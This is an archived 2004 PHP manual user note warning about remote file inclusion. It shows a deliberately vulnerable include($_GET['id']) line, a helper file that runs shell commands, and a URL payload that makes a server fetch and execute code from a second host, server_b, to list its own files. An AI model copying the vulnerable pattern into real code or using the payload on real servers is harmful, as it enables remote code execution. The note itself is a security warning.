note 42906 added to function.include

From: Date: Thu, 03 Jun 2004 08:09:34 +0000
Subject: note 42906 added to function.include
Groups: php.notes 
Request: Send a blank email to php-notes+get-70760@lists.php.net to get a copy of this message
I would like to emphasize the danger of remote includes. For example: Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code: <?php // File: index.php include ($_GET['id'].".php"); ?> This is, of course, not a very good way to program, but i actually found a program doing this. Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the following code: <?php // File: list.php $output = ""; exec("ls -al",$output); foreach($output as $line) { echo $line . "<br>\n"; } ?> If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list then Server B will execute list.php and Server A will include the output of Server B, a list of files. But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A! I tried this on three different servers, and it allways worked. This is only an example, but there have been hacks uploading files to servers etc. So, allways be extremely carefull with remote includes. ---- Manual Page -- http://www.php.net/manual/en/function.include.php Edit -- http://master.php.net/manage/user-notes.php?action=edit+42906 Delete -- http://master.php.net/manage/user-notes.php?action=delete+42906&report=yes Reject -- http://master.php.net/manage/user-notes.php?action=reject+42906&report=yes Search -- http://master.php.net/manage/user-notes.php

« previous php.notes (#70760) next »